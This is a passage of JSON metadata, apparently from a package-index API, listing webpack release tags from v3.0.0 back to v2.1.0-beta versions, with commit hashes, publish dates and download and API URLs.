eleases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad3